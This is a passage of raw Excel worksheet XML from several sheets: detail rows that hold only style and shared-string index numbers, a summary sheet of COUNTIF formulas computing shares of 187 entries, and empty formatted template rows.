      <c r="P173" s="184"/>
      <c r="Q173" s="182"/>
      <c r="R173" s="182"/>
      <c r="S173" s="182"/>
      <c r="T173" s="182"/>
      <c r="U173" s="182"/>
      <c r="V173" s="183"/>
      <c r="W173" s="181"/>
      <c r="X173" s="88" t="s">
        <v>1558</v>
      </c>
      <c r="Y173" t="s">
        <v>1559</v>
      </c>
      <c r="Z173" s="91" t="s">
        <v>1560</v>
      </c>
    </row>
    <row r="174" spans="1:26" ht="72" x14ac:dyDescent="0.3">
      <c r="A174" s="62">
        <v>171</v>
      </c>
      <c r="B174" s="89" t="s">
        <v>2</v>
      </c>
      <c r="C174" s="89" t="s">
        <v>76</v>
      </c>
      <c r="D174" s="90" t="s">
        <v>879</v>
      </c>
      <c r="E174" s="191"/>
      <c r="F174" s="191"/>
      <c r="G174" s="191"/>
      <c r="H174" s="191"/>
      <c r="I174" s="191"/>
      <c r="J174" s="191"/>
      <c r="K174" s="191"/>
      <c r="L174" s="191"/>
      <c r="M174" s="191"/>
      <c r="N174" s="184"/>
      <c r="O174" s="184"/>
      <c r="P174" s="184"/>
      <c r="Q174" s="182"/>
      <c r="R174" s="182"/>
      <c r="S174" s="182"/>
      <c r="T174" s="182"/>
      <c r="U174" s="182"/>
      <c r="V174" s="183"/>
      <c r="W174" s="181"/>
      <c r="X174" s="88" t="s">
        <v>1561</v>
      </c>
      <c r="Y174" t="s">
        <v>1562</v>
      </c>
      <c r="Z174" s="88" t="s">
        <v>1563</v>
      </c>
    </row>
    <row r="175" spans="1:26" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A175" s="62">
        <v>172</v>
      </c>
      <c r="B175" s="89" t="s">
        <v>2</v>
      </c>
      <c r="C175" s="89" t="s">
        <v>77</v>
      </c>
      <c r="D175" s="90" t="s">
        <v>920</v>
      </c>
      <c r="E175" s="191"/>
      <c r="F175" s="191"/>
      <c r="G175" s="191"/>
      <c r="H175" s="191"/>
      <c r="I175" s="191"/>
      <c r="J175" s="191"/>
      <c r="K175" s="191"/>
      <c r="L175" s="191"/>
      <c r="M175" s="191"/>
      <c r="N175" s="191"/>
      <c r="O175" s="184"/>
      <c r="P175" s="184"/>
      <c r="Q175" s="182"/>
      <c r="R175" s="182"/>
      <c r="S175" s="182"/>
      <c r="T175" s="182"/>
      <c r="U175" s="182"/>
      <c r="V175" s="183"/>
      <c r="W175" s="184"/>
      <c r="X175" s="88" t="s">
        <v>1564</v>
      </c>
      <c r="Y175" t="s">
        <v>1565</v>
      </c>
      <c r="Z175" s="91" t="s">
        <v>1566</v>
      </c>
    </row>
    <row r="176" spans="1:26" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A176" s="62">
        <v>173</v>
      </c>
      <c r="B176" s="89" t="s">
        <v>2</v>
      </c>
      <c r="C176" s="89" t="s">
        <v>78</v>
      </c>
      <c r="D176" s="90" t="s">
        <v>946</v>
      </c>
      <c r="E176" s="191"/>
      <c r="F176" s="191"/>
      <c r="G176" s="191"/>
      <c r="H176" s="191"/>
      <c r="I176" s="191"/>
      <c r="J176" s="191"/>
      <c r="K176" s="191"/>
      <c r="L176" s="191"/>
      <c r="M176" s="191"/>
      <c r="N176" s="184"/>
      <c r="O176" s="184"/>
      <c r="P176" s="184"/>
      <c r="Q176" s="182"/>
      <c r="R176" s="182"/>
      <c r="S176" s="182"/>
      <c r="T176" s="182"/>
      <c r="U176" s="182"/>
      <c r="V176" s="183"/>
      <c r="W176" s="181"/>
      <c r="X176" s="88" t="s">
        <v>1567</v>
      </c>
      <c r="Y176" t="s">
        <v>1568</v>
      </c>
      <c r="Z176" s="88" t="s">
        <v>1569</v>
      </c>
    </row>
    <row r="177" spans="1:26" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A177" s="62">
        <v>174</v>
      </c>
      <c r="B177" s="89" t="s">
        <v>2</v>
      </c>
      <c r="C177" s="89" t="s">
        <v>80</v>
      </c>
      <c r="D177" s="90" t="s">
        <v>1003</v>
      </c>
      <c r="E177" s="191"/>
      <c r="F177" s="191"/>
      <c r="G177" s="191"/>
      <c r="H177" s="191"/>
      <c r="I177" s="191"/>
      <c r="J177" s="191"/>
      <c r="K177" s="191"/>
      <c r="L177" s="191"/>
      <c r="M177" s="191"/>
      <c r="N177" s="184"/>
      <c r="O177" s="184"/>
      <c r="P177" s="184"/>
      <c r="Q177" s="182"/>
      <c r="R177" s="182"/>
      <c r="S177" s="182"/>
      <c r="T177" s="182"/>
      <c r="U177" s="182"/>
      <c r="V177" s="183"/>
      <c r="W177" s="181"/>
      <c r="X177" s="88" t="s">
        <v>1570</v>
      </c>
      <c r="Y177" t="s">
        <v>1571</v>
      </c>
      <c r="Z177" s="91" t="s">
        <v>1572</v>
      </c>
    </row>
    <row r="178" spans="1:26" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A178" s="62">
        <v>175</v>
      </c>
      <c r="B178" s="89" t="s">
        <v>2</v>
      </c>
      <c r="C178" s="89" t="s">
        <v>81</v>
      </c>
      <c r="D178" s="90" t="s">
        <v>1007</v>
      </c>
      <c r="E178" s="191"/>
      <c r="F178" s="191"/>
      <c r="G178" s="191"/>
      <c r="H178" s="191"/>
      <c r="I178" s="184"/>
      <c r="J178" s="191"/>
      <c r="K178" s="191"/>
      <c r="L178" s="191"/>
      <c r="M178" s="191"/>
      <c r="N178" s="184"/>
      <c r="O178" s="184"/>
      <c r="P178" s="184"/>
      <c r="Q178" s="182"/>
      <c r="R178" s="66"/>
      <c r="S178" s="182"/>
      <c r="T178" s="182"/>
      <c r="U178" s="182"/>
      <c r="V178" s="183"/>
      <c r="W178" s="181"/>
      <c r="X178" s="88" t="s">
        <v>1573</v>
      </c>
      <c r="Y178" t="s">
        <v>1574</v>
      </c>
      <c r="Z178" s="88" t="s">
        <v>1575</v>
      </c>
    </row>
    <row r="179" spans="1:26" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A179" s="62">
        <v>176</v>
      </c>
      <c r="B179" s="89" t="s">
        <v>1576</v>
      </c>
      <c r="C179" s="89" t="s">
        <v>44</v>
      </c>
      <c r="D179" s="90" t="s">
        <v>216</v>
      </c>
      <c r="E179" s="191"/>
      <c r="F179" s="191"/>
      <c r="G179" s="191"/>
      <c r="H179" s="191"/>
      <c r="I179" s="191"/>
      <c r="J179" s="191"/>
      <c r="K179" s="191"/>
      <c r="L179" s="191"/>
      <c r="M179" s="191"/>
      <c r="N179" s="184"/>
      <c r="O179" s="184"/>
      <c r="P179" s="184"/>
      <c r="Q179" s="182"/>
      <c r="R179" s="182"/>
      <c r="S179" s="182"/>
      <c r="T179" s="182"/>
      <c r="U179" s="182"/>
      <c r="V179" s="183"/>
      <c r="W179" s="181"/>
      <c r="X179" s="88" t="s">
        <v>1577</v>
      </c>
      <c r="Y179" t="s">
        <v>1578</v>
      </c>
      <c r="Z179" s="88" t="s">
        <v>1579</v>
      </c>
    </row>
    <row r="180" spans="1:26" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A180" s="62">
        <v>177</v>
      </c>
      <c r="B180" s="89" t="s">
        <v>1576</v>
      </c>
      <c r="C180" s="89" t="s">
        <v>45</v>
      </c>
      <c r="D180" s="90" t="s">
        <v>240</v>
      </c>
      <c r="E180" s="191"/>
      <c r="F180" s="191"/>
      <c r="G180" s="191"/>
      <c r="H180" s="191"/>
      <c r="I180" s="191"/>
      <c r="J180" s="191"/>
      <c r="K180" s="191"/>
      <c r="L180" s="191"/>
      <c r="M180" s="191"/>
      <c r="N180" s="184"/>
      <c r="O180" s="184"/>
      <c r="P180" s="184"/>
      <c r="Q180" s="182"/>
      <c r="R180" s="182"/>
      <c r="S180" s="182"/>
      <c r="T180" s="182"/>
      <c r="U180" s="182"/>
      <c r="V180" s="183"/>
      <c r="W180" s="181"/>
      <c r="X180" s="88" t="s">
        <v>1580</v>
      </c>
      <c r="Y180" t="s">
        <v>1581</v>
      </c>
      <c r="Z180" s="91" t="s">
        <v>1582</v>
      </c>
    </row>
    <row r="181" spans="1:26" ht="158.4" x14ac:dyDescent="0.3">
      <c r="A181" s="62">
        <v>178</v>
      </c>
      <c r="B181" s="89" t="s">
        <v>1576</v>
      </c>
      <c r="C181" s="89" t="s">
        <v>46</v>
      </c>
      <c r="D181" s="90" t="s">
        <v>248</v>
      </c>
      <c r="E181" s="191"/>
      <c r="F181" s="191"/>
      <c r="G181" s="191"/>
      <c r="H181" s="191"/>
      <c r="I181" s="191"/>
      <c r="J181" s="191"/>
      <c r="K181" s="191"/>
      <c r="L181" s="191"/>
      <c r="M181" s="191"/>
      <c r="N181" s="184"/>
      <c r="O181" s="184"/>
      <c r="P181" s="184"/>
      <c r="Q181" s="182"/>
      <c r="R181" s="182"/>
      <c r="S181" s="182"/>
      <c r="T181" s="182"/>
      <c r="U181" s="182"/>
      <c r="V181" s="183"/>
      <c r="W181" s="181"/>
      <c r="X181" s="88" t="s">
        <v>1583</v>
      </c>
      <c r="Y181" t="s">
        <v>1584</v>
      </c>
      <c r="Z181" s="88" t="s">
        <v>1585</v>
      </c>
    </row>
    <row r="182" spans="1:26" ht="158.4" x14ac:dyDescent="0.3">
      <c r="A182" s="62">
        <v>179</v>
      </c>
      <c r="B182" s="89" t="s">
        <v>1576</v>
      </c>
      <c r="C182" s="89" t="s">
        <v>47</v>
      </c>
      <c r="D182" s="90" t="s">
        <v>252</v>
      </c>
      <c r="E182" s="191"/>
      <c r="F182" s="191"/>
      <c r="G182" s="191"/>
      <c r="H182" s="191"/>
      <c r="I182" s="191"/>
      <c r="J182" s="191"/>
      <c r="K182" s="191"/>
      <c r="L182" s="191"/>
      <c r="M182" s="191"/>
      <c r="N182" s="184"/>
      <c r="O182" s="184"/>
      <c r="P182" s="184"/>
      <c r="Q182" s="182"/>
      <c r="R182" s="182"/>
      <c r="S182" s="182"/>
      <c r="T182" s="182"/>
      <c r="U182" s="182"/>
      <c r="V182" s="183"/>
      <c r="W182" s="181"/>
      <c r="X182" s="88" t="s">
        <v>1586</v>
      </c>
      <c r="Y182" t="s">
        <v>1587</v>
      </c>
      <c r="Z182" s="88" t="s">
        <v>1588</v>
      </c>
    </row>
    <row r="183" spans="1:26" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A183" s="62">
        <v>180</v>
      </c>
      <c r="B183" s="89" t="s">
        <v>1576</v>
      </c>
      <c r="C183" s="89" t="s">
        <v>58</v>
      </c>
      <c r="D183" s="90" t="s">
        <v>555</v>
      </c>
      <c r="E183" s="191"/>
      <c r="F183" s="191"/>
      <c r="G183" s="191"/>
      <c r="H183" s="191"/>
      <c r="I183" s="191"/>
      <c r="J183" s="191"/>
      <c r="K183" s="191"/>
      <c r="L183" s="191"/>
      <c r="M183" s="191"/>
      <c r="N183" s="184"/>
      <c r="O183" s="184"/>
      <c r="P183" s="184"/>
      <c r="Q183" s="182"/>
      <c r="R183" s="182"/>
      <c r="S183" s="182"/>
      <c r="T183" s="182"/>
      <c r="U183" s="182"/>
      <c r="V183" s="183"/>
      <c r="W183" s="181"/>
      <c r="X183" s="88" t="s">
        <v>1589</v>
      </c>
      <c r="Y183" t="s">
        <v>1590</v>
      </c>
      <c r="Z183" s="88" t="s">
        <v>1591</v>
      </c>
    </row>
    <row r="184" spans="1:26" ht="216" x14ac:dyDescent="0.3">
      <c r="A184" s="62">
        <v>181</v>
      </c>
      <c r="B184" s="89" t="s">
        <v>1576</v>
      </c>
      <c r="C184" s="89" t="s">
        <v>66</v>
      </c>
      <c r="D184" s="90" t="s">
        <v>690</v>
      </c>
      <c r="E184" s="191"/>
      <c r="F184" s="191"/>
      <c r="G184" s="191"/>
      <c r="H184" s="191"/>
      <c r="I184" s="191"/>
      <c r="J184" s="191"/>
      <c r="K184" s="191"/>
      <c r="L184" s="191"/>
      <c r="M184" s="191"/>
      <c r="N184" s="184"/>
      <c r="O184" s="184"/>
      <c r="P184" s="184"/>
      <c r="Q184" s="182"/>
      <c r="R184" s="182"/>
      <c r="S184" s="182"/>
      <c r="T184" s="182"/>
      <c r="U184" s="182"/>
      <c r="V184" s="183"/>
      <c r="W184" s="181"/>
      <c r="X184" s="88" t="s">
        <v>1592</v>
      </c>
      <c r="Y184" t="s">
        <v>1593</v>
      </c>
      <c r="Z184" s="88" t="s">
        <v>1594</v>
      </c>
    </row>
    <row r="185" spans="1:26" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A185" s="62">
        <v>182</v>
      </c>
      <c r="B185" s="89" t="s">
        <v>1576</v>
      </c>
      <c r="C185" s="89" t="s">
        <v>68</v>
      </c>
      <c r="D185" s="90" t="s">
        <v>732</v>
      </c>
      <c r="E185" s="191"/>
      <c r="F185" s="190"/>
      <c r="G185" s="190"/>
      <c r="H185" s="191"/>
      <c r="I185" s="191"/>
      <c r="J185" s="191"/>
      <c r="K185" s="191"/>
      <c r="L185" s="191"/>
      <c r="M185" s="191"/>
      <c r="N185" s="184"/>
      <c r="O185" s="184"/>
      <c r="P185" s="184"/>
      <c r="Q185" s="182"/>
      <c r="R185" s="182"/>
      <c r="S185" s="182"/>
      <c r="T185" s="182"/>
      <c r="U185" s="182"/>
      <c r="V185" s="183"/>
      <c r="W185" s="181"/>
      <c r="X185" s="88" t="s">
        <v>1595</v>
      </c>
      <c r="Y185" t="s">
        <v>1596</v>
      </c>
      <c r="Z185" s="88" t="s">
        <v>1597</v>
      </c>
    </row>
    <row r="186" spans="1:26" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A186" s="62">
        <v>183</v>
      </c>
      <c r="B186" s="89" t="s">
        <v>1576</v>
      </c>
      <c r="C186" s="89" t="s">
        <v>69</v>
      </c>
      <c r="D186" s="90" t="s">
        <v>751</v>
      </c>
      <c r="E186" s="191"/>
      <c r="F186" s="191"/>
      <c r="G186" s="191"/>
      <c r="H186" s="191"/>
      <c r="I186" s="191"/>
      <c r="J186" s="197"/>
      <c r="K186" s="197"/>
      <c r="L186" s="191"/>
      <c r="M186" s="191"/>
      <c r="N186" s="191"/>
      <c r="O186" s="184"/>
      <c r="P186" s="184"/>
      <c r="Q186" s="182"/>
      <c r="R186" s="182"/>
      <c r="S186" s="182"/>
      <c r="T186" s="182"/>
      <c r="U186" s="182"/>
      <c r="V186" s="183"/>
      <c r="W186" s="181"/>
      <c r="X186" s="88" t="s">
        <v>1598</v>
      </c>
      <c r="Y186" t="s">
        <v>1599</v>
      </c>
      <c r="Z186" s="91" t="s">
        <v>1600</v>
      </c>
    </row>
    <row r="187" spans="1:26" ht="230.4" x14ac:dyDescent="0.3">
      <c r="A187" s="62">
        <v>184</v>
      </c>
      <c r="B187" s="89" t="s">
        <v>1576</v>
      </c>
      <c r="C187" s="89" t="s">
        <v>75</v>
      </c>
      <c r="D187" s="90" t="s">
        <v>873</v>
      </c>
      <c r="E187" s="191"/>
      <c r="F187" s="190"/>
      <c r="G187" s="191"/>
      <c r="H187" s="191"/>
      <c r="I187" s="191"/>
      <c r="J187" s="191"/>
      <c r="K187" s="191"/>
      <c r="L187" s="191"/>
      <c r="M187" s="191"/>
      <c r="N187" s="184"/>
      <c r="O187" s="184"/>
      <c r="P187" s="184"/>
      <c r="Q187" s="182"/>
      <c r="R187" s="182"/>
      <c r="S187" s="182"/>
      <c r="T187" s="182"/>
      <c r="U187" s="182"/>
      <c r="V187" s="183"/>
      <c r="W187" s="181"/>
      <c r="X187" s="88" t="s">
        <v>1601</v>
      </c>
      <c r="Y187" t="s">
        <v>1602</v>
      </c>
      <c r="Z187" s="88" t="s">
        <v>1603</v>
      </c>
    </row>
    <row r="188" spans="1:26" ht="158.4" x14ac:dyDescent="0.3">
      <c r="A188" s="62">
        <v>185</v>
      </c>
      <c r="B188" s="89" t="s">
        <v>1576</v>
      </c>
      <c r="C188" s="89" t="s">
        <v>79</v>
      </c>
      <c r="D188" s="90" t="s">
        <v>995</v>
      </c>
      <c r="E188" s="191"/>
      <c r="F188" s="191"/>
      <c r="G188" s="191"/>
      <c r="H188" s="191"/>
      <c r="I188" s="191"/>
      <c r="J188" s="191"/>
      <c r="K188" s="191"/>
      <c r="L188" s="191"/>
      <c r="M188" s="191"/>
      <c r="N188" s="184"/>
      <c r="O188" s="184"/>
      <c r="P188" s="184"/>
      <c r="Q188" s="182"/>
      <c r="R188" s="182"/>
      <c r="S188" s="182"/>
      <c r="T188" s="182"/>
      <c r="U188" s="182"/>
      <c r="V188" s="183"/>
      <c r="W188" s="181"/>
      <c r="X188" s="88" t="s">
        <v>1604</v>
      </c>
      <c r="Y188" t="s">
        <v>1605</v>
      </c>
      <c r="Z188" s="88" t="s">
        <v>1606</v>
      </c>
    </row>
    <row r="189" spans="1:26" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A189" s="62">
        <v>186</v>
      </c>
      <c r="B189" s="89" t="s">
        <v>205</v>
      </c>
      <c r="C189" s="89" t="s">
        <v>84</v>
      </c>
      <c r="D189" s="90" t="s">
        <v>536</v>
      </c>
      <c r="E189" s="191"/>
      <c r="F189" s="191"/>
      <c r="G189" s="191"/>
      <c r="H189" s="191"/>
      <c r="I189" s="191"/>
      <c r="J189" s="191"/>
      <c r="K189" s="191"/>
      <c r="L189" s="191"/>
      <c r="M189" s="191"/>
      <c r="N189" s="184"/>
      <c r="O189" s="184"/>
      <c r="P189" s="184"/>
      <c r="Q189" s="182"/>
      <c r="R189" s="182"/>
      <c r="S189" s="182"/>
      <c r="T189" s="182"/>
      <c r="U189" s="182"/>
      <c r="V189" s="183"/>
      <c r="W189" s="181"/>
      <c r="X189" s="88" t="s">
        <v>1607</v>
      </c>
      <c r="Y189" t="s">
        <v>1608</v>
      </c>
      <c r="Z189" s="88" t="s">
        <v>1609</v>
      </c>
    </row>
    <row r="190" spans="1:26" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A190" s="62">
        <v>187</v>
      </c>
      <c r="B190" s="89" t="s">
        <v>205</v>
      </c>
      <c r="C190" s="89" t="s">
        <v>87</v>
      </c>
      <c r="D190" s="90" t="s">
        <v>835</v>
      </c>
      <c r="E190" s="191"/>
      <c r="F190" s="201"/>
      <c r="G190" s="201"/>
      <c r="H190" s="201"/>
      <c r="I190" s="191"/>
      <c r="J190" s="191"/>
      <c r="K190" s="191"/>
      <c r="L190" s="191"/>
      <c r="M190" s="191"/>
      <c r="N190" s="184"/>
      <c r="O190" s="184"/>
      <c r="P190" s="184"/>
      <c r="Q190" s="182"/>
      <c r="R190" s="182"/>
      <c r="S190" s="182"/>
      <c r="T190" s="182"/>
      <c r="U190" s="182"/>
      <c r="V190" s="183"/>
      <c r="W190" s="181"/>
      <c r="X190" s="88" t="s">
        <v>1610</v>
      </c>
      <c r="Y190" t="s">
        <v>1611</v>
      </c>
      <c r="Z190" s="88" t="s">
        <v>1612</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="Y156" r:id="rId1"/>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topLeftCell="A31" workbookViewId="0">
      <selection activeCell="C8" sqref="C8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="18.6640625" customWidth="1"/>
    <col min="4" max="4" width="10.6640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:19" ht="21" x14ac:dyDescent="0.4">
      <c r="A1" s="60" t="s">
        <v>1021</v>
      </c>
    </row>
    <row r="3" spans="1:19" x14ac:dyDescent="0.3">
      <c r="B3" s="9" t="s">
        <v>1027</v>
      </c>
      <c r="C3" s="9" t="s">
        <v>1618</v>
      </c>
      <c r="D3" s="9"/>
      <c r="Q3" s="120" t="s">
        <v>1028</v>
      </c>
      <c r="R3" s="121" t="s">
        <v>1029</v>
      </c>
      <c r="S3" s="122" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="4" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A4" t="s">
        <v>1031</v>
      </c>
      <c r="B4" s="128">
        <f>C4/187</f>
        <v>0</v>
      </c>
      <c r="C4" s="126">
        <f>COUNTIF(Details!Q4:Q190,"5")</f>
        <v>0</v>
      </c>
      <c r="E4" s="119"/>
      <c r="Q4" s="123">
        <f>COUNTIF(Details!V4:V190,"1")</f>
        <v>0</v>
      </c>
      <c r="R4" s="124">
        <f>COUNTIF(Details!V4:V190,"2")</f>
        <v>0</v>
      </c>
      <c r="S4" s="125">
        <f>COUNTIF(Details!V4:V190,"3")</f>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A5" t="s">
        <v>1617</v>
      </c>
      <c r="B5" s="128">
        <f>C5/187</f>
        <v>0</v>
      </c>
      <c r="C5" s="126">
        <f>COUNTIF(Details!R4:R190,"4")</f>
        <v>0</v>
      </c>
      <c r="E5" s="119"/>
    </row>
    <row r="6" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A6" t="s">
        <v>1619</v>
      </c>
      <c r="B6" s="128">
        <f>C6/187</f>
        <v>0</v>
      </c>
      <c r="C6" s="126">
        <f>COUNTIF(Details!T4:T190,"2")</f>
        <v>0</v>
      </c>
      <c r="E6" s="119"/>
    </row>
    <row r="7" spans="1:19" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A7" s="111" t="s">
        <v>1620</v>
      </c>
      <c r="B7" s="128">
        <f>C7/187</f>
        <v>0</v>
      </c>
      <c r="C7" s="126">
        <f>COUNTIF(Details!S4:S190,"3")</f>
        <v>0</v>
      </c>
      <c r="E7" s="119"/>
    </row>
    <row r="8" spans="1:19" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A8" s="111" t="s">
        <v>1621</v>
      </c>
      <c r="B8" s="128">
        <f>C8/187</f>
        <v>0</v>
      </c>
      <c r="C8" s="126">
        <f>COUNTIF(Details!U4:U190,"1")</f>
        <v>0</v>
      </c>
      <c r="E8" s="119"/>
    </row>
    <row r="9" spans="1:19" x14ac:dyDescent="0.3">
      <c r="B9" s="12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D14" sqref="D14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="11.44140625" customWidth="1"/>
    <col min="2" max="2" width="8.33203125" customWidth="1"/>
    <col min="3" max="3" width="22.33203125" customWidth="1"/>
    <col min="4" max="4" width="25.33203125" customWidth="1"/>
    <col min="5" max="5" width="11.6640625" customWidth="1"/>
    <col min="6" max="6" width="8.109375" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="8.88671875" style="9"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" ht="31.2" x14ac:dyDescent="0.6">
      <c r="A1" s="55" t="s">
        <v>1021</v>
      </c>
      <c r="B1" s="55"/>
    </row>
    <row r="3" spans="1:9" ht="16.2" thickBot="1" x14ac:dyDescent="0.35">
      <c r="A3" s="56" t="s">
        <v>1022</v>
      </c>
      <c r="B3" s="56" t="s">
        <v>1026</v>
      </c>
      <c r="C3" s="56" t="s">
        <v>1023</v>
      </c>
      <c r="D3" s="56" t="s">
        <v>1024</v>
      </c>
      <c r="E3" s="56" t="s">
        <v>1025</v>
      </c>
      <c r="F3" s="58" t="s">
        <v>1027</v>
      </c>
      <c r="G3" s="58"/>
      <c r="H3" s="58"/>
      <c r="I3" s="58"/>
    </row>
    <row r="5" spans="1:9" x14ac:dyDescent="0.3">
      <c r="A5" s="9"/>
      <c r="B5" s="9"/>
      <c r="E5" s="9"/>
      <c r="F5" s="59"/>
    </row>
    <row r="6" spans="1:9" x14ac:dyDescent="0.3">
      <c r="A6" s="9"/>
      <c r="B6" s="9"/>
      <c r="E6" s="9"/>
      <c r="F6" s="59"/>
    </row>
    <row r="7" spans="1:9" x14ac:dyDescent="0.3">
      <c r="A7" s="9"/>
      <c r="B7" s="9"/>
      <c r="E7" s="9"/>
      <c r="F7" s="59"/>
    </row>
    <row r="8" spans="1:9" x14ac:dyDescent="0.3">
      <c r="A8" s="9"/>
      <c r="B8" s="9"/>
      <c r="E8" s="9"/>
      <c r="F8" s="59"/>
    </row>
    <row r="9" spans="1:9" x14ac:dyDescent="0.3">
      <c r="A9" s="9"/>
      <c r="B9" s="9"/>
      <c r="E9" s="9"/>
      <c r="F9" s="59"/>
    </row>
    <row r="10" spans="1:9" x14ac:dyDescent="0.3">
      <c r="A10" s="9"/>
      <c r="B10" s="9"/>
      <c r="E10" s="9"/>
      <c r="F10" s="59"/>
    </row>
    <row r="11" spans="1:9" x14ac:dyDescent="0.3">
      <c r="A11" s="9"/>
      <c r="B11" s="9"/>
      <c r="E11" s="9"/>
      <c r="F11" s="59"/>
    </row>
    <row r="12" spans="1:9" x14ac:dyDescent="0.3">
      <c r="A12" s="9"/>
      <c r="B12" s="9"/>
      <c r="E12" s="9"/>
      <c r="F12" s="59"/>
    </row>
    <row r="13" spans="1:9" x14ac:dyDescent="0.3">
      <c r="A13" s="9"/>
      <c r="B13" s="9"/>
      <c r="E13" s="9"/>
      <c r="F13" s="59"/>
    </row>
    <row r="14" spans="1:9" x14ac:dyDescent="0.3">
      <c r="A14" s="9"/>
      <c r="B14" s="9"/>
      <c r="E14" s="9"/>
      <c r="F14" s="59"/>
    </row>
    <row r="15" spans="1:9" x14ac:dyDescent="0.3">
      <c r="A15" s="9"/>
      <c r="B15" s="9"/>
      <c r="E15" s="9"/>
      <c r="F15" s="59"/>
    </row>
    <row r="16" spans="1:9" x14ac:dyDescent="0.3">
      <c r="A16" s="9"/>
      <c r="B16" s="9"/>
      <c r="E16" s="9"/>
      <c r="F16" s="59"/>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A17" s="9"/>
      <c r="B17" s="9"/>
      <c r="E17" s="9"/>
      <c r="F17" s="59"/>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A18" s="9"/>
      <c r="B18" s="9"/>
      <c r="E18" s="9"/>
      <c r="F18" s="59"/>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A19" s="9"/>
      <c r="B19" s="9"/>
      <c r="E19" s="9"/>
      <c r="F19" s="59"/>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A20" s="9"/>
      <c r="B20" s="9"/>
      <c r="E20" s="9"/>
      <c r="F20" s="59"/>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A21" s="9"/>
      <c r="B21" s="9"/>
      <c r="E21" s="9"/>
      <c r="F21" s="59"/>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A22" s="57"/>
      <c r="B22" s="9"/>
      <c r="E22" s="9"/>
      <c r="F22" s="59"/>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A23" s="9"/>
      <c r="B23" s="9"/>
      <c r="E23" s="9"/>
      <c r="F23" s="59"/>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A24" s="9"/>
      <c r="B24" s="9"/>
      <c r="E24" s="9"/>
      <c r="F24" s="59"/>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A25" s="9"/>
      <c r="B25" s="9"/>
      <c r="E25" s="9"/>
      <c r="F25" s="59"/>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A26" s="9"/>
      <c r="B26" s="9"/>
      <c r="E26" s="9"/>
    </row>
    <row r="27" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A27" s="9"/>
      <c r="B27" s="9"/>
    </row>
    <row r="28" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A28" s="9"/>
      <c r="B28" s="9"/>
    </row>
  </sheetData>
  <sortState ref="M4:M114">
    <sortCondition ref="M4:M114"/>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
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D9" sqref="D9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="2" max="2" width="19.6640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="2:13" x14ac:dyDescent="0.3">
      <c r="B3" s="67" t="s">
        <v>198</v>
      </c>
      <c r="C3" s="163" t="s">
        <v>199</v>
      </c>
      <c r="D3" s="163"/>
      <c r="E3" s="163"/>
      <c r="F3" s="163"/>
      <c r="G3" s="163"/>
      <c r="H3" s="163"/>
      <c r="I3" s="163"/>
      <c r="J3" s="163"/>
      <c r="K3" s="163"/>
      <c r="L3" s="163"/>
      <c r="M3" s="163"/>
    </row>
    <row r="5" spans="2:13" ht="28.8" x14ac:dyDescent="0.3">
      <c r="B5" s="67" t="s">
        <v>1019</v>
      </c>
      <c r="C5" s="68" t="s">
        <v>1020</v>
      </c>
      <c r="D5" s="62"/>
      <c r="E5" s="62"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="C3:M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5" zoomScaleNormal="145" workbookViewId="0">
      <selection activeCell="B2" sqref="B2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>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E6" sqref="E6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>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1"/>
  <sheetViews>
    <sheetView topLeftCell="E2" zoomScale="115" zoomScaleNormal="115" workbookViewId="0">
      <pane ySplit="1524" activePane="bottomLeft"/>
      <selection activeCell="J2" sqref="J1:J1048576"/>
      <selection pane="bottomLeft" activeCell="K4" sqref="K4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="4" style="9" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="21" customWidth="1"/>
    <col min="3" max="3" width="17.88671875" customWidth="1"/>
